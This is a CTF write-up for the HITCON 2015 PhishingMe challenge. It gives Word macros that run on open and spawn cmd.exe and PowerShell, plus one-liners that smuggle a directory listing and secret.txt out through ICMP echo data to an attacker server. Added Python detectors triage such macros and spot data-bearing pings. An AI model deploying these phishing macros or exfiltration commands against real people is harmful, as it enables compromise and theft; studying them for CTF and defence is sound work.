CTF writeup: HITCON-PhishingMe
If you send a .doc file with the topic "HITCON 2015", I will open it!
Find the flag in my file system. Note: I will open a macro for you ^ _________________ ^ [email protected]
PhishingMe, interesting. Introduction: we can put a VBScript macro in a .doc file to do the phishing. Here we go!
Prepare malicious files
First, we need Microsoft Word. The .doc file needs to run the script automatically when it is opened. The process is as follows:
Create a .doc file and find the Macros option on the Developer tab.
Create a new macro.
The macro we create uses cmd.exe to run a simple command.

    ' Word runs AutoOpen automatically when the document is opened;
    ' Auto_Open is kept as well so the macro fires under either name.
    Sub Auto_Open()
        Call Debugging
    End Sub

    Sub AutoOpen()
        Call Debugging
    End Sub

    ' Spawn cmd.exe and ping our server so we can confirm execution.
    Public Function Debugging() As Variant
        Set objShell = CreateObject("Wscript.Shell")
        strCmd = "cmd.exe /c ""ping SERVER_IP"""
        Set objExec = objShell.Exec(strCmd)
    End Function
Put these in the macro window and save them.
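From the defender's side, the macro above is exactly what static triage of Office documents looks for: an auto-execute entry point combined with process creation. As an added example (my own code, not from the writeup), the Python below reimplements that keyword triage over VBA source text. In practice the source is first extracted from the .doc with a tool such as oletools' olevba, which performs a similar classification; this toy version takes the source as a string, using the writeup's macro and a constructed benign macro as inputs. The indicator list and verdict thresholds are my own assumptions.

```python
import re

# VBA entry points Word runs without user interaction, and the indicator classes
# that, combined with one of them, make a document worth detonating in a sandbox.
AUTOEXEC_SUBS = ("AutoOpen", "Auto_Open", "Document_Open", "AutoExec",
                 "AutoClose", "Document_Close")
INDICATORS = {
    "shell-object": r'CreateObject\s*\(\s*"wscript\.shell"\s*\)',
    "shell-exec": r"\.(?:Exec|Run)\s*\(",
    "cmd": r"\bcmd(?:\.exe)?\b",
    "powershell": r"\bpowershell\b",
    "ping": r"\bping\b|NetworkInformation\.Ping",
}


def triage_vba(source: str) -> dict:
    """Static triage of VBA source text: auto-exec subs, indicator hits and a verdict."""
    autoexec = [name for name in AUTOEXEC_SUBS
                if re.search(r"\bSub\s+%s\s*\(" % re.escape(name), source, re.I)]
    hits = {}
    for label, pattern in INDICATORS.items():
        found = sorted({m.group(0) for m in re.finditer(pattern, source, re.I)})
        if found:
            hits[label] = found
    if autoexec and ("shell-object" in hits or "shell-exec" in hits):
        verdict = "suspicious"   # runs on open and spawns a process: the writeup's pattern
    elif autoexec or hits:
        verdict = "review"       # one half of the pattern; needs a human look
    else:
        verdict = "clean"
    return {"autoexec": autoexec, "indicators": hits, "verdict": verdict}


# The macro from the writeup, reproduced as sample input.
PHISHING_MACRO = '''
Sub Auto_Open()
    Call Debugging
End Sub

Sub AutoOpen()
    Call Debugging
End Sub

Public Function Debugging() As Variant
    Set objShell = CreateObject("Wscript.Shell")
    strCmd = "cmd.exe /c ""ping SERVER_IP"""
    Set objExec = objShell.Exec(strCmd)
End Function
'''

# Constructed benign macro: no auto-exec entry point, no process creation.
BENIGN_MACRO = '''
Sub FormatTable()
    Selection.Tables(1).Style = "Grid Table 4"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("phishing", PHISHING_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage_vba(src))
```

The verdict deliberately keys on the combination rather than on any single keyword: a macro that merely mentions cmd.exe in a string is "review", while one that both auto-runs and calls Exec/Run on a Wscript.Shell object is "suspicious" regardless of what command it carries.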
To test whether the command is executed, we watch for the ping request on our server:
tcpdump -nXX icmp
Save the .doc, open it again, and check for the ICMP echo request arriving at the server:
10:25:49.351725 IP MY-TEST-IP > MY-IP: ICMP echo request, id 1, seq 21, length 40
Sweet! The .doc file works on our end. Let's see whether it also works on the target. After receiving the link, we send the .doc file to phishing.me.hitcon.2015 # gmail.com, wait a moment, and check the traffic.
10:29:21.411226 IP VICTIM-IP > MY-IP: ICMP echo request, id 1, seq 21, length 40
The command runs normally. What should we do next?
Trial and error
First, I tried the usual CTF strategy: upload a shell, then find the flag. We tried the PowerShell RAT from PowerShell Empire. After 30-45 minutes of testing we realized that the callback never reached our server from the target machine, even though it had worked in our local test environment. There must be a firewall or something similar blocking that outbound traffic. But we did receive traffic from the target...
Ping FTW
We know that ICMP echo requests do get through to our server, and we can execute commands through VBScript. So is there anything that sends a ping with data of our choosing... PowerShell?! (I'm very excited; this is my first time using PowerShell in a CTF.) Let's look at how to send ICMP echo requests.
The Microsoft documentation defines System.Net.NetworkInformation.Ping as follows:
It seems that Send takes an IP address, a timeout, and a buffer as parameters?
Next, let's look at the ICMP echo request layout from the RFC.
It turns out that the ICMP echo request carries a data field, and the third parameter of the Send method sets it.
Call this function in Powershell:
(New-Object System.Net.NetworkInformation.Ping).Send(server_ip, timeout, buffer)
In theory, we can put command output into that buffer and read it back from the tcpdump output. Let's do a quick dir over ICMP:
powershell "$dir=dir; (New-Object System.Net.NetworkInformation.Ping).Send('SERVER_IP', 1000, $dir)"
Putting this command into the VBScript macro should work:

    Sub Auto_Open()
        Call Debugging
    End Sub

    Sub AutoOpen()
        Call Debugging
    End Sub

    ' Run dir in PowerShell and send the listing as the data field of an ICMP echo request.
    Public Function Debugging() As Variant
        Set objShell = CreateObject("Wscript.Shell")
        strCmd = "powershell ""$dir=dir;(New-Object System.Net.NetworkInformation.Ping).Send('OUR_SERVER_IP', 1000, [system.Text.Encoding]::UTF8.GetBytes($dir))"""
        Set objExec = objShell.Exec(strCmd)
    End Function

Send it to the target and we get interesting results:

    10:10:00.816080 IP VICTIM_IP > OUR_SERVER_IP: ICMP echo request, id 1, seq 19, length 75
        0x0030:  6773 2050 726f 6772 616d 2046 696c 6573  gs.Program.Files
        0x0040:  2050 726f 6772 616d 2046 696c 6573 2028  .Program.Files.(
        0x0050:  7838 3629 2055 7365 7273 2057 696e 646f  x86).Users.Windo
        0x0060:  7773 2073 6563 7265 742e 7478 74         ws.secret.txt

secret.txt is what we are after. Replace dir with type secret.txt and see whether we get anything good:

    Sub Auto_Open()
        Call Debugging
    End Sub

    Sub AutoOpen()
        Call Debugging
    End Sub

    ' Same as before, but send the contents of secret.txt instead of the listing.
    Public Function Debugging() As Variant
        Set objShell = CreateObject("Wscript.Shell")
        strCmd = "powershell ""$dir=type secret.txt;(New-Object System.Net.NetworkInformation.Ping).Send('OUR_SERVER_IP', 1000, [system.Text.Encoding]::UTF8.GetBytes($dir))"""
        Set objExec = objShell.Exec(strCmd)
    End Function

Result:

    10:11:35.383781 IP VICTIM_IP > OUR_SERVER_IP: ICMP echo request, id 1, seq 20, length 52
        ...
        0x0020:  .... .... .... .... .... 6869 7463 6f6e  hitcon
        0x0030:  7b6d 3463 7230 5f6d 6131 7761 7265 5f31  {m4cr0_ma1ware_1
        0x0040:  735f 6d34 6b31 6e67 5f61 5f63 306d 6562  s_m4k1ng_a_c0meb
        0x0050:  3463 6b21 217d                           4ck!!}
Here we find the flag:
hitcon{m4cr0_ma1ware_1s_m4k1ng_a_c0meb4ck!!}
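The two hex dumps above were decoded by eye. As an added example from the defender's side (my own code, not part of the writeup), the Python below does that job for a capture: it rebuilds frames from tcpdump -nXX text, pulls the data field out of every ICMP echo request and flags any that does not carry the stock Windows ping pattern, which is how the exfiltration in this challenge would stand out in a capture. The sample capture is constructed inline (192.0.2.10 and 198.51.100.5 are documentation addresses) and the parser needs the full dump from offset 0x0000, which the writeup truncates. The "stock pattern" check models only Windows ping.exe, as in the challenge; other ping implementations use different filler and would need their own rule.

```python
import re
import struct

# Default echo data sent by Windows ping.exe: this 32-byte alphabet pattern,
# repeated when a larger -l size is used.
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"

# One "0x0010:  4500 003c ...  E..<" line of tcpdump -XX. Hex words are separated by
# a single space and the ASCII column by at least two, so the regex stops before it.
_HEX_LINE = re.compile(r"^\s*0x([0-9a-f]{4}):\s+([0-9a-f]{2,4}(?: [0-9a-f]{2,4}){0,7})", re.I)


def parse_tcpdump_hex(dump: str) -> list:
    """Rebuild raw frames from tcpdump -XX text; a line at offset 0x0000 starts a new frame."""
    frames, words = [], []
    for line in dump.splitlines():
        m = _HEX_LINE.match(line)
        if not m:
            continue  # summary lines and anything else are skipped
        if int(m.group(1), 16) == 0 and words:
            frames.append(bytes.fromhex("".join(words)))
            words = []
        words.extend(m.group(2).split())
    if words:
        frames.append(bytes.fromhex("".join(words)))
    return frames


def icmp_echo_data(frame: bytes):
    """Return (src, dst, data) for an Ethernet/IPv4/ICMP echo request, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ip[9] != 1:
        return None
    icmp = ip[ihl:struct.unpack("!H", ip[2:4])[0]]
    if len(icmp) < 8 or icmp[0] != 8:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    return src, dst, icmp[8:]


def classify_echo_data(data: bytes) -> str:
    """'benign' for the stock Windows pattern (any -l size), otherwise anomalous."""
    n = len(data)
    if n == 0 or data == (WINDOWS_PING_DATA * (n // 32 + 1))[:n]:
        return "benign"
    printable = sum(32 <= b < 127 for b in data) / n
    return "anomalous-text" if printable > 0.9 else "anomalous-binary"


def scan_dump(dump: str) -> list:
    """Report every echo request in a tcpdump -nXX capture with its data-field verdict."""
    findings = []
    for frame in parse_tcpdump_hex(dump):
        parsed = icmp_echo_data(frame)
        if parsed:
            src, dst, data = parsed
            findings.append({"src": src, "dst": dst, "length": len(data),
                             "verdict": classify_echo_data(data), "data": data})
    return findings


# --- Constructed sample capture (not from the writeup) -----------------------

def _inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum for the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_frame(src: str, dst: str, data: bytes, seq: int = 1) -> bytes:
    """Build an Ethernet/IPv4/ICMP echo request as tcpdump -XX would capture it."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, seq) + data
    icmp = icmp[:2] + struct.pack("!H", _inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 128, 1, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    ip = ip[:10] + struct.pack("!H", _inet_checksum(ip)) + ip[12:]
    return bytes.fromhex("001122334455" "66778899aabb" "0800") + ip + icmp


def tcpdump_xx(frame: bytes) -> str:
    """Render bytes in tcpdump -XX layout: offset, up to 8 hex words, two spaces, ASCII."""
    lines = []
    for off in range(0, len(frame), 16):
        chunk = frame[off:off + 16]
        hexpart = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("\t0x%04x:  %-39s  %s" % (off, hexpart, text))
    return "\n".join(lines)


SAMPLE_DUMP = "\n".join([
    "10:25:49.351725 IP 192.0.2.10 > 198.51.100.5: ICMP echo request, id 1, seq 21, length 40",
    tcpdump_xx(build_echo_frame("192.0.2.10", "198.51.100.5", WINDOWS_PING_DATA, 21)),
    "10:29:21.411226 IP 192.0.2.10 > 198.51.100.5: ICMP echo request, id 1, seq 22, length 46",
    tcpdump_xx(build_echo_frame("192.0.2.10", "198.51.100.5",
                                b"Program Files Users Windows secret.txt", 22)),
])

if __name__ == "__main__":
    for f in scan_dump(SAMPLE_DUMP):
        print("%(src)s > %(dst)s  %(length)3d bytes  %(verdict)s  %(data)r" % f)
```

Run against a real capture, feed it the text of tcpdump -nXX icmp; the size of the data field is a second signal worth alerting on, since a stock Windows ping is 32 bytes and the listing in this challenge was 67.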
A cool challenge, especially the use of PowerShell.